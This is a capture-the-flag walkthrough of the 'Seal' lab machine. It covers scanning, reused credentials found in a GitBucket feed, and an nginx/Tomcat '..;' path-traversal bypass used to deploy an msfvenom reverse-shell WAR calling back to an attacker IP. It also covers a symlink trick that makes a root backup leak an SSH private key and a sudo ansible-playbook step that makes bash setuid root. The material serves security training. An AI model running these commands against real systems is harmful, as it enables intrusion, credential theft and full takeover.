SEAL

Scanning

NMAP

➜  ~ sudo nmap -F seal.htb           
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-19 08:24 EDT
Nmap scan report for seal.htb (10.10.10.250)
Host is up (0.16s latency).
Not shown: 97 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
443/tcp  open  https
8080/tcp open  http-proxy
Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds

The fast scan (-F, top 100 ports) finishes in about a second; start poking at these three ports while the full -p- scan below runs (it takes almost twelve minutes).

➜  ~ sudo nmap -T4 -p- -A seal.htb       
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-19 08:13 EDT
Nmap scan report for seal.htb (10.10.10.250)
Host is up (0.22s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
|   256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_  256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp  open  ssl/http   nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Seal Market
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after:  2022-05-05T10:24:03
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Thu, 19 Aug 2021 12:23:54 GMT
|     Set-Cookie: JSESSIONID=node01frvnjr75rhdfsbmdepqve4n287.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   GetRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Thu, 19 Aug 2021 12:23:52 GMT
|     Set-Cookie: JSESSIONID=node05b59i0stcc6s1ffnbtlbvqhoe85.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Thu, 19 Aug 2021 12:23:53 GMT
|     Set-Cookie: JSESSIONID=node01ru35o66qwp7pncfzoorb2jyt86.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Allow: GET,HEAD,POST,OPTIONS
|     Content-Length: 0
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   Socks4: 
|     HTTP/1.1 400 Illegal character CNTL=0x4
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
|   Socks5: 
|     HTTP/1.1 400 Illegal character CNTL=0x5
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   128.44 ms 10.10.16.1
2   228.82 ms seal.htb (10.10.10.250)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 709.02 seconds

Enumeration

port 8080 (GitBucket)

The service nmap flagged as http-proxy is a GitBucket instance (the node0 suffix on the JSESSIONID cookie is the default worker name of Jetty, the server GitBucket ships with). Register an account and sign in.

Browsing the users and repositories, we find the usernames root, luis and alex.

Scrolling the news feed turns up an interesting entry (screenshot not reproduced here); open it.

It contains credentials: tomcat:42MrHBf*z8{Z%

Logging in to GitBucket as tomcat with this password fails.

Trying it against the other usernames works for luis (password reuse): luis:42MrHBf*z8{Z%

Nothing else of interest here for now.

port 443

Directory busting

From the error pages and the GitBucket repository we know the backend behind nginx is Tomcat, so look for the manager application.

/manager/status.xsd (Status: 200) [Size: 4374]

Open /manager/status and answer the HTTP basic auth prompt with the credentials from GitBucket, tomcat:42MrHBf*z8{Z%

We're in.

Exploit

Trying Path Traversal

nginx refuses direct requests to /manager/html (the manager GUI) but lets /manager/status through. The two servers parse the path differently: nginx matches its location on the raw path, where "..;" is just an odd segment name, while Tomcat strips the ";" path parameter from that segment and then normalises the "..", so the request below reaches /manager/html:

https://seal.htb/manager/status/..;/html

This opens the Tomcat Web Application Manager, which lets us deploy (upload) WAR files.

Generate a JSP reverse shell packaged as a WAR with msfvenom (LHOST is your VPN address):

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.30 LPORT=9999 -f war -o rshell.war

Start a matching Metasploit handler (multi/handler with the same payload and LPORT 9999) before deploying.

The deploy form posts to /manager/html/upload, which nginx blocks again, so the upload fails unless we intercept the request in Burp and apply the same "..;" trick to the upload path:

Edit the POST request path to /manager/jmxproxy/..;/html/upload

The WAR deploys successfully.

Trigger it by browsing to the deployed context, https://seal.htb/rshell/ (the WAR file name becomes the context path).

The handler catches a reverse shell on the Tomcat host.
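To see why both "..;" requests above work, here is a small local model of how nginx and Tomcat read the same path. It is an added example and not code from the original writeup or from either server; it assumes nginx matches location prefixes on the dot-normalised raw path with no special meaning for ";", and that Tomcat removes ";param" from every segment (servlet path parameters) before collapsing "." and "..". The protected prefix /manager/html and the two traversal paths come from the writeup; the function names are illustrative.

```shell
# Added example, not from the original writeup: a local model of how nginx and
# Tomcat read the same request path, to show why /manager/status/..;/html lands
# on Tomcat's /manager/html even though nginx only lets /manager/status through.
# Assumptions: nginx matches "location" prefixes on the dot-normalised raw path and
# gives ";" no special meaning; Tomcat strips ";param" from every path segment
# (servlet path parameters) before it normalises "." and "..".

# Collapse "." and ".." segments of an absolute path. A segment spelled "..;"
# is just a literal name here, not a parent reference.
resolve_dots() (
  set -f; IFS='/'; out=""
  for seg in $1; do
    case "$seg" in
      ''|'.') ;;
      '..')   out="${out%/*}" ;;
      *)      out="$out/$seg" ;;
    esac
  done
  printf '%s\n' "${out:-/}"
)

# nginx's view: dots collapsed, ";" kept, so "..;" never walks up a level.
nginx_path() { resolve_dots "$1"; }

# Tomcat's view: drop ";..." from each segment first, then collapse the dots.
tomcat_path() { resolve_dots "$(printf '%s' "$1" | sed 's#;[^/]*##g')"; }

# Would nginx's "location /manager/html" (the path it refuses) match this request?
nginx_blocks() {
  case "$(nginx_path "$1")" in
    /manager/html*) return 0 ;;
    *)              return 1 ;;
  esac
}

for p in '/manager/html' '/manager/status/..;/html' '/manager/jmxproxy/..;/html/upload'; do
  if nginx_blocks "$p"; then verdict=blocked; else verdict=proxied; fi
  printf '%-36s nginx: %-8s tomcat sees %s\n' "$p" "$verdict" "$(tomcat_path "$p")"
done
```

The first path is blocked at nginx; the other two are proxied because nginx sees a sub-path of /manager/status or /manager/jmxproxy, yet Tomcat resolves them to /manager/html and /manager/html/upload. The fix on the nginx side is to deny on what the backend will see, not on the raw string.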

Privilege Escalation

Check what is running with ps aux. Besides Tomcat there is a periodic backup job that runs with higher privileges than our shell.

Backup Script

The backup archives the dashboard directory under the Tomcat webroot, including its uploads folder, and it follows symlinks. Since we can write to that folder as the Tomcat user, plant a symlink to luis's .ssh directory there so the next run copies it into the archive:

ln -s /home/luis/.ssh/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads

Wait for the next run, then find the new archive name:

ls /opt/backups/archives/

Copy it somewhere writable:

cp /opt/backups/archives/backup-2021-07-13-03:00:32.gz rsa.gz

It is a gzip-compressed tar, so decompress and then extract it:

gzip -kd rsa.gz
tar -xf rsa

Follow the backed-up path to the private key (the symlink was copied as a real directory, so the key is now readable by us):

cd dashboard/uploads/.ssh

cat id_rsa

Copy the key to your local machine, set its permissions to 600 and use it to ssh in as luis.
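The following is an added example, not part of the original writeup: it replays the symlink trick in a scratch directory so you can see exactly why the archive ends up holding luis's key, and what changes when the backup does not dereference links. It assumes the root backup job copies the dashboard tree while following symlinks (rsync -L / Ansible synchronize with copy_links, modelled here with cp -RL) and then tars and gzips the copy; the directory layout mirrors the writeup, the key is a constructed sample string, and nothing touches /home or /opt.

```shell
# Added example, not from the original writeup: a self-contained re-run of the
# symlink trick in a scratch directory. Assumption: the root backup job copies
# the dashboard tree while dereferencing symlinks (rsync -L / Ansible synchronize
# copy_links: yes, modelled here with cp -RL) and then archives the copy.
# Nothing below touches /home or /opt; the "key" is a constructed sample string.

# Run the whole cycle once. $1 is the cp flag set the backup uses:
# "-RL" dereferences symlinks, "-R" copies them as symlinks.
# Prints "leaked" if the extracted archive holds a real copy of id_rsa,
# "symlink" if it only holds the link itself.
simulate_backup() {
  lab=$(mktemp -d); out=$(mktemp -d)
  mkdir -p "$lab/home/luis/.ssh" "$lab/webroot/admin/dashboard/uploads" "$lab/files"
  printf 'constructed sample, not a real key\n' > "$lab/home/luis/.ssh/id_rsa"
  chmod 600 "$lab/home/luis/.ssh/id_rsa"

  # tomcat user: plant the symlink inside the directory root is about to back up
  ln -s "$lab/home/luis/.ssh" "$lab/webroot/admin/dashboard/uploads/.ssh"

  # root cron: copy (following links or not), then archive as backup-<date>.gz
  cp "$1" "$lab/webroot/admin/dashboard" "$lab/files/"
  tar -czf "$lab/backup.gz" -C "$lab/files" dashboard

  # attacker: gunzip + untar the archive and look under dashboard/uploads/.ssh
  tar -xzf "$lab/backup.gz" -C "$out"
  if [ -L "$out/dashboard/uploads/.ssh" ]; then
    echo symlink
  elif [ -f "$out/dashboard/uploads/.ssh/id_rsa" ]; then
    echo leaked
  else
    echo missing
  fi
  rm -rf "$lab" "$out"
}

simulate_backup -RL   # follows links: prints "leaked"
simulate_backup -R    # keeps links:   prints "symlink"
```

The lesson for the defender is in the second run: a backup that preserves symlinks instead of following them archives only the link, and a low-privileged user who can write into the backed-up tree gains nothing.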

Root User

Check sudo rights with sudo -l: luis may run ansible-playbook as root. A playbook is just a YAML list of tasks, and a task can run an arbitrary shell command, so whatever we put in the playbook executes as root.

Read these first ...

https://www.redhat.com/en/topics/automation/what-is-an-ansible-playbook

https://www.middlewareinventory.com/blog/ansible-command-examples/

Create a playbook file with any name, e.g. "root.yml", whose task sets the setuid bit on /bin/bash.

Run it with sudo ansible-playbook, then start /bin/bash -p to get a root shell. The -p matters; from the bash manual:

-p Turned on whenever the real and effective user ids do not match. Disables processing of the $ENV file and importing of shell functions. Turning this option off causes the effective uid and gid to be set to the real uid and gid.
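As an added example (not the playbook from the original writeup, which is not reproduced there), here is what the root.yml step can contain, plus a check for the result. It assumes sudo -l allows luis to run ansible-playbook as root, so the "shell" task runs as root; the file path used below is illustrative, and on the box you must pass a path that matches the sudoers rule.

```shell
# Added example, not from the original writeup: a playbook for the "root.yml"
# step and the checks around it. Assumptions: "sudo -l" shows luis may run
# ansible-playbook as root (the writeup does not print the rule), so every task
# in the playbook executes as root; the "shell" module flips the setuid bit on
# /bin/bash, which is what makes "bash -p" give a shell with euid 0.

# Write the playbook to the path given as $1 and echo that path.
write_root_playbook() {
  cat > "$1" <<'EOF'
- hosts: localhost
  gather_facts: false
  tasks:
    - name: make bash setuid root so "bash -p" keeps euid 0
      shell: chmod u+s /bin/bash
EOF
  printf '%s\n' "$1"
}

# True when the setuid bit is set on $1 (POSIX test -u), i.e. the playbook ran.
is_setuid() { [ -u "$1" ]; }

playbook=$(write_root_playbook "$(mktemp -d)/root.yml")
cat "$playbook"

# On the box, as luis (use a path that matches the sudoers rule sudo -l printed):
#   sudo ansible-playbook "$playbook"
#   is_setuid /bin/bash && /bin/bash -p   # -p keeps euid 0 instead of dropping to luis
#   id                                    # shows euid=0(root)
```

Without -p, bash notices that the real and effective uids differ and resets the effective uid to the real one, which is why a plain /bin/bash would silently hand you an unprivileged shell again.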
